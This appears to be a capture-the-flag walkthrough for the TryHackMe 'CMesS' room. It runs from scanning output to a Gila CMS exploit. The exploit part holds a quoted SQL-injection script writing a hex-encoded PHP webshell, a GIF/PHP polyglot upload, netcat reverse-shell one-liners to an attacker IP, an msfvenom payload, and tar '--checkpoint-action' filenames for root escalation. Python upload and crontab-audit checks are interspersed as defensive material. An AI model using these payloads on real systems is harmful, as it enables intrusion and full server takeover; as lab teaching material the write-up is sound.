Before we begin, you can access this room by creating an account with tryhackme.com and browsing to this link to join it, or by simply searching for “CMesS” under the Hacktivities tab.

Reconnaissance

  • blog powered by Gila CMS
  • might be running a version released back in 2017 as per the copyright claim
  • doesn’t leak any username via blog posts
  • doesn’t leak anything via source code

Scanning & Enumeration

Running nmap to find open ports

# Nmap 7.80 scan initiated Mon Jul 27 19:33:41 2020 as: nmap -sV -sC -oA nmap/top1000 -vv 10.10.84.254

Nmap scan report for 10.10.84.254
Host is up, received syn-ack (0.100s latency).
Scanned at 2020-07-27 19:33:41 BST for 14s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvfxduhH7oHBPaAYuN66Mf6eL6AJVYqiFAh6Z0gBpD08k+pzxZDtbA3cdniBw3+DHe/uKizsF0vcAqoy8jHEXOOdsOmJEqYXjLJSayzjnPwFcuaVaKOjrlmWIKv6zwurudO9kJjylYksl0F/mRT6ou1+UtE2K7lDDiy4H3CkBZALJvA0q1CNc53sokAUsf5eEh8/t8oL+QWyVhtcbIcRcqUDZ68UcsTd7K7Q1+GbxNa3wftE0xKZ+63nZCVz7AFEfYF++glFsHj5VH2vF+dJMTkV0jB9hpouKPGYmxJK3DjHbHk5jN9KERahvqQhVTYSy2noh9CBuCYv7fE2DsuDIF
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGOVQ0bHJHx9Dpyf9yscggpEywarn6ZXqgKs1UidXeQqyC765WpF63FHmeFP10e8Vd3HTdT3d/T8Nk3Ojt8mbds=
|   256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFUGmaB6zNbqDfDaG52mR3Ku2wYe1jZX/x57d94nxxkC
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 27 19:33:55 2020 -- 1 IP address (1 host up) scanned in 14.11 seconds
  • 2 ports open
    • HTTP
    • SSH
  • /src/ /themes/ /lib/ disallowed in robots.txt
  • Apache version 2.4.18 released somewhere in 2018
    • latest apache version 2.4.43 as of now
  • some high vulnerabilities in this version: link

CVSS vulnerabilities with a score of 7+

Note: running nmap with the -p- switch returns no other open ports

Searching Exploit-DB with searchsploit for known exploits for Gila CMS

searchsploit 'Gila CMS'

------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                       |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------
Gila CMS 1.11.8 - 'query' SQL Injection                                                                                                              | php/webapps/48590.py
Gila CMS 1.9.1 - Cross-Site Scripting                                                                                                                | php/webapps/46557.txt
Gila CMS < 1.11.1 - Local File Inclusion                                                                                                             | multiple/webapps/47407.txt
------------------------------------------------------------------------------------------------------------------------------------------------------
  • got a python script that can perform SQL injection on gila 1.11.8
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno

if len(sistemot.argv) < 2:
    print("Usage: ./CVE_2020_5515.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]

cookies = {'PHPSESSID': 'lcvp6aig6pg1dlq8coh44e8sq1', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}

webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "

print("[*] Injecting ")

cmdphp  = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"

url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)

vremeto.sleep(1)

print("[*] Executing")

r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")

print("You have a webshell in http://" + ip + "/" + shellname + "?cmd=command")
  • running it prints that a webshell was created, but when attempting to run commands nothing happens; it appears the website is not vulnerable to this attack

Testing for SQL injection with sqlmap

sqlmap -r login.req --level 5 --risk 3 --threads 10

Output returns not injectable.

Running nikto to scan the website for vulnerabilities

nikto -h cmess.thm -o nikto.txt

- Nikto v2.1.6/2.1.5
+ Target Host: cmess.thm
+ Target Port: 80
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET "robots.txt" contains 3 entries which should be manually viewed.
+ HEAD Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ UNMYUKLM Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ GET Cookie PHPSESSID created without the httponly flag
+ GET /admin/config.php: PHP Config file may contain database IDs and passwords.
+ GET /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ GET /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ OSVDB-3233: GET /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: GET /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-376: GET /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-4804: GET //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
+ OSVDB-2813: GET /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-2842: GET //admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt
+ OSVDB-2922: GET /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-3092: GET /admin/: This might be interesting...
+ OSVDB-3092: GET /login/: This might be interesting...
+ OSVDB-3093: GET /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-4238: GET /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: GET /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-6666: GET /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
+ OSVDB-9624: GET /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-3092: GET /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
+ GET /admin/account.asp: Admin login page/section found.
+ GET /admin/account.html: Admin login page/section found.
+ GET /admin/account.php: Admin login page/section found.
+ GET /admin/controlpanel.asp: Admin login page/section found.
+ GET /admin/controlpanel.html: Admin login page/section found.
+ GET /admin/controlpanel.php: Admin login page/section found.
+ GET /admin/cp.asp: Admin login page/section found.
+ GET /admin/cp.html: Admin login page/section found.
+ GET /admin/cp.php: Admin login page/section found.
+ GET /admin/home.asp: Admin login page/section found.
+ GET /admin/home.php: Admin login page/section found.
+ GET /admin/index.asp: Admin login page/section found.
+ GET /admin/index.html: Admin login page/section found.
+ GET /admin/login.asp: Admin login page/section found.
+ GET /admin/login.html: Admin login page/section found.
+ GET /admin/login.php: Admin login page/section found.
+ GET /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ GET /admin/status: Tomcat Server Status interface found (pass protected)
+ GET /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
  • tested all OSVDB vulnerabilities, no luck in bypassing the admin page

Running gobuster to brute-force website directory paths

gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.out

/index (Status: 200)
/about (Status: 200)
/search (Status: 200)
/blog (Status: 200)
/1 (Status: 200)
/01 (Status: 200)
/login (Status: 200)
/category (Status: 200)
/0 (Status: 200)
/feed (Status: 200)
/themes (Status: 301)
/admin (Status: 200)
/assets (Status: 301)
/tag (Status: 200)
/author (Status: 200)
/Search (Status: 200)
/sites (Status: 301)
/About (Status: 200)
/log (Status: 301)
/Index (Status: 200)
/tags (Status: 200)
/1x1 (Status: 200)
/lib (Status: 301)
/src (Status: 301)
/api (Status: 200)
/001 (Status: 200)
/1pix (Status: 200)
/fm (Status: 200)
/tmp (Status: 301)
/1a (Status: 200)
/0001 (Status: 200)
/1x1transparent (Status: 200)
/INDEX (Status: 200)
/1px (Status: 200)
/1d (Status: 200)
/1_1 (Status: 200)
/Author (Status: 200)
/1pixel (Status: 200)
/0001-exploits (Status: 200)
/01_hello (Status: 200)
/1-1 (Status: 200)
/1st (Status: 200)
/Category (Status: 200)
/00000001 (Status: 200)
/1X1 (Status: 200)
/1x1_spacer (Status: 200)
/1b (Status: 200)
/1s (Status: 200)
/1f (Status: 200)
/1h (Status: 200)
/1x1trans (Status: 200)
/00001 (Status: 200)
/1click (Status: 200)
/1_2006 (Status: 200)
/1_2007 (Status: 200)
/1c (Status: 200)
/000001 (Status: 200)
/1by1 (Status: 200)
/Feed (Status: 200)
/1ptrans (Status: 200)
/SEARCH (Status: 200)
/1-2 (Status: 200)
/1tr (Status: 200)
/1_3 (Status: 200)
/1e (Status: 200)
/1star (Status: 200)
/1stars-sFFDD81 (Status: 200)
/1x1black (Status: 200)
/1x1t (Status: 200)
/1x1spacer (Status: 200)
/01topics (Status: 200)
/1A (Status: 200)
/1_2 (Status: 200)
/01-02 (Status: 200)
/1x (Status: 200)
/1_0 (Status: 200)
/1pxinv (Status: 200)
/1stars (Status: 200)
  • found the admin and login pages
  • the paths highlighted in robots.txt are inaccessible - unauthorized
  • the rest are not of much help at this moment

Running wfuzz to fuzz for subdomains

wfuzz -c -f wfuzz.out -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                    
===================================================================

000000019:   200        30 L     104 W    934 Ch      "dev"                                                                                                                      

Total time: 57.14272
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 87.44770
  • found dev subdomain. Let’s add it to /etc/hosts
Development Log

andre@cmess.thm
Have you guys fixed the bug that was found on live?

support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!

support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances

andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.

support@cmess.thm
Your password has been reset. Here: XXXXXXXXX
  • got a username and password for the admin page
  • misconfigured .htaccess file that we can potentially exploit

Gaining Access

Using the credentials found on dev, we can log in on the admin portal where we also find the CMS version currently running (1.10.9)

CMS Version

  • we can also get the PHP version: PHP Version 7.0.33-0ubuntu0.16.04.9
  • content > file manager gives us access to the .htaccess file
# 3 MONTHS - unlikely to be changed
<IfModule mod_headers.c>
  <FilesMatch "\.(css|js|jpg|jpeg|png|gif|webp)$">
  Header set Cache-Control "max-age=2592000, public"
  </FilesMatch>
</IfModule>

<IfModule mod_gzip.c>
  mod_gzip_on       Yes
  mod_gzip_dechunk  Yes
  mod_gzip_item_include file  \.(html?|txt|css|js|php|pl|jpg|png|gif)$
</IfModule>

RewriteEngine On

# exclude these folders
RewriteCond %{REQUEST_URI} !/vendor/
RewriteCond %{REQUEST_URI} !/src/
RewriteCond %{REQUEST_URI} !/themes/
RewriteCond %{REQUEST_URI} !/lib/
RewriteCond %{REQUEST_URI} !/assets/
RewriteCond %{REQUEST_URI} !/tmp/
RewriteCond %{REQUEST_URI} !robots.txt

# dont list folder contents
IndexIgnore *

RewriteRule (.*)$ index.php?url=$1 [QSA,L]

# enforce https redirection
# RewriteCond %{HTTPS} off
# RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]

# redirect all sites
# RewriteCond %{HTTP_HOST} ^(.*)$ [NC]
# RewriteCond %{HTTP_HOST} !^localhost$ [NC]
# RewriteRule ^assets/(.*)$ sites/%{HTTP_HOST}/assets/$1 [NC]
# RewriteRule ^tmp/(.*)$ sites/%{HTTP_HOST}/tmp/$1 [NC]

Googling around, I found this post on github which explains a file upload filter bypass vulnerability which can allow us to execute code remotely on the server - https://github.com/GilaCMS/gila/pull/49

To do so, follow the below steps:

touch test.gif
echo 'GIF89a; <?=`$_GET[1]`?>' > test.gif

Next, upload the GIF file in Admin > Content > Media and press the N looking button to move it to tmp/media_thumb/rev.php

uploading payload

Now that we have successfully uploaded a PHP file on the server, we need to allow execution of such files as currently this is blocked.

Browse http://cmess.thm/admin/fm?f=tmp/.htaccess and edit the file like shown:

editing htaccess file to allow execution of php scripts

You will now be able to browse to cmess.thm/tmp/media_thumb/rev.php?1= and run arbitrary code such as cmess.thm/tmp/media_thumb/rev.php?1=cat /etc/passwd
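To show the defensive side of the upload trick just described, here is an added example (not Gila's code and not from the original post): a magic-bytes-only validator of the kind a GIF89a-prefixed file defeats, beside a hardened check that also refuses non-image extensions on upload or on a rename in the file manager and rejects any embedded PHP open tag. The sample bytes are constructed.

```python
import re

# Constructed sample of the polyglot from the walkthrough: a GIF header
# followed by a PHP short-echo tag.
POLYGLOT_GIF = b"GIF89a; <?=`$_GET[1]`?>\n"

# Constructed minimal 1x1 GIF (header, screen descriptor, palette, image, trailer).
BENIGN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
              b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}
ALLOWED_EXT = {"gif", "png", "jpg", "jpeg"}
# Matches <?php, <?= and the short <? open tag anywhere in the body.
PHP_OPEN_TAG = re.compile(rb"<\?")

def magic_only_check(data):
    """The weak check the bypass relies on: trusts the leading magic bytes."""
    return any(data.startswith(magic) for magic in IMAGE_MAGIC)

def sniff_image_type(data):
    """Return the image type implied by the file header, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def hardened_check(filename, data):
    """Validate an upload (or a rename/move in the file manager) as an image.
    Returns (ok, reason).  Rejects non-image extensions, header/extension
    mismatches, and any embedded PHP open tag."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    kind = sniff_image_type(data)
    if kind is None:
        return False, "unrecognised image header"
    if ext != kind and not (ext == "jpeg" and kind == "jpg"):
        return False, "extension does not match content"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"
```

Content checks alone are not enough: the walkthrough also needed PHP execution enabled in tmp/, so keeping the script engine disabled for upload directories is the second half of the fix.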

Let’s get a reverse shell. First, we need to find a suitable reverse shell payload. I found this to work just fine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.12.168 9001 >/tmp/f

Afterwards, we need to set up a listener locally and URL-encode the payload in order for it to execute successfully. I used Burp's decoder/encoder to URL-encode it:

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%31%2e%31%32%2e%31%36%38%20%39%30%30%31%20%3e%2f%74%6d%70%2f%66

Finally, running the below will grant us a reverse shell:

cmess.thm/tmp/media_thumb/rev.php?1=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%31%2e%31%32%2e%31%36%38%20%39%30%30%31%20%3e%2f%74%6d%70%2f%66

getting a reverse shell

Privesc

www-data to andre

Now that we have a foothold, I started looking for privesc opportunities by running linPEAS to further enumerate the box.

Found a backup file:

/tmp/andre_backup.tar.gz
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *

A few other interesting details:

[+] Superusers
root:x:0:0:root:/root:/bin/bash

[+] Users with console
andre:x:1000:1000:andre,,,:/home/andre:/bin/bash
root:x:0:0:root:/root:/bin/bash

I noticed that python3 is installed, and I started an HTTP server just to get andre_backup.tar.gz to my kali machine. The backup file contains a note reading: Note to self. Anything in here will be backed up!

Unfortunately, we do not have access to write to /home nor are we able to browse to andre’s home folder.

In /tmp/ we can only read the archive. Checking /etc/crontab we can see the cron job running every 30 seconds, however, we do not have access to modify it.

Let’s enumerate the box again using linenum.sh with the -t param for thorough testing:

./ls.sh -t

[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 36 Feb  6 18:54 /opt/.password.bak

Cool, we found a password.bak file that we have full access to.

www-data@cmess:/var/www/html/xpl0it$ cat /opt/.password.bak 
andres backup password
[REDACTED]

andre to root

We can now use the password found in the backup file to ssh into the box as andre:

ssh andre@cmess.thm
The authenticity of host 'cmess.thm (10.10.80.171)' can't be established.
ECDSA key fingerprint is SHA256:sWfTNeZtMkhHDii33U60/cvVhAonkgxNTMtJ+KYQ7bI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cmess.thm,10.10.80.171' (ECDSA) to the list of known hosts.
andre@cmess.thm's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Thu Feb 13 15:02:43 2020 from 10.0.0.20
andre@cmess:~$

We’re in as Andre. Great! We need to run the enum scripts again to see what else we can do:

[+] PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#usdpath
/home/andre/bin:/home/andre/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
New path exported: /home/andre/bin:/home/andre/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp         --->    HP-UX_10.20
/usr/bin/passwd         --->    Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/chfn           --->    SuSE_9.3/10
/usr/bin/sudo           --->    /sudo$
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ntfs-3g            --->    Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
/bin/fusermount
/bin/mount              --->    Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping6
/bin/su
/bin/ping
/bin/umount             --->    BSD/Linux(08-1996)

[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/mlocate
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd

Checking SGID/SUID and running sudo -l we can see that we’re not in the sudoers file and can’t do much. However, during our initial enumeration we found a crontab job that’s backing up Andre’s backup directory:

*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *

The problem with this is that it has a wildcard at the end, which can be exploited to gain a shell as the user running the job, in our case root. A great blog post explaining the whole process can be found here.

andre@cmess:~$ cd backup/
andre@cmess:~$ chmod 777 backup/

Generate a reverse shell payload with MSF locally and start a netcat listener:

msfvenom -p cmd/unix/reverse_netcat lhost=tun0 lport=9001 R

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload                                                                                              
[-] No arch selected, selecting arch: cmd from the payload                                                                                                                       
No encoder specified, outputting raw payload
Payload size: 90 bytes
mkfifo /tmp/jwhd; nc 10.11.12.168 9001 0</tmp/jwhd | /bin/sh >/tmp/jwhd 2>&1; rm /tmp/jwhd

nc -lvnp 9001

Run the following on the victim machine:

echo "mkfifo /tmp/jwhd; nc 10.11.12.168 9001 0</tmp/jwhd | /bin/sh >/tmp/jwhd 2>&1; rm /tmp/jwhd" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

On the next job run, you will get a reverse shell as the user running the crontab job.
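For the defender's side of the wildcard issue, here is an added example (not from the original post or the room): an auditor that parses system crontab lines, flags tar jobs whose file operands come from a bare `*` glob without a `--` end-of-options marker, and a helper that lists option-looking filenames in a backed-up directory. The crontab text is constructed; its first job is the entry shown above.

```python
import re
import shlex

# Constructed crontab text: the first job is the entry from the walkthrough,
# the other two are constructed safe variants for comparison.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
0 3 * * *       root    cd /etc && tar -zcf /var/backups/etc.tgz -- *
30 1 * * *      backup  cd /srv/data && tar czf /tmp/data.tgz ./*
"""

# System crontab format: five time fields, a user, then the command.
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def tar_wildcard_risk(command):
    """Return a reason string if the command runs tar with a bare '*' glob
    that is not preceded by '--', else None.  With a bare '*', a file named
    like '--checkpoint-action=...' is parsed by tar as an option; a leading
    '--' or a './*' glob makes every expansion a plain file operand."""
    # Split chains and pipelines into simple commands (adequate for cron lines).
    for segment in re.split(r"&&|\|\||;|\|", command):
        try:
            args = shlex.split(segment)
        except ValueError:
            continue
        if not args or args[0].rsplit("/", 1)[-1] != "tar":
            continue
        for arg in args[1:]:
            if arg == "--":
                break            # everything after this is a file operand
            if arg == "*":
                return "bare '*' glob expands into tar's option parsing"
    return None

def analyse_crontab(text):
    """Return (user, command, reason) for every risky job in a crontab."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # comments and VAR=value lines
        m = CRON_LINE.match(line)
        if not m:
            continue
        reason = tar_wildcard_risk(m["cmd"])
        if reason:
            findings.append((m["user"], m["cmd"], reason))
    return findings

def option_like_names(names):
    """Flag filenames starting with '-' (e.g. planted checkpoint files)."""
    return sorted(n for n in names if n.startswith("-"))
```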

gaining root access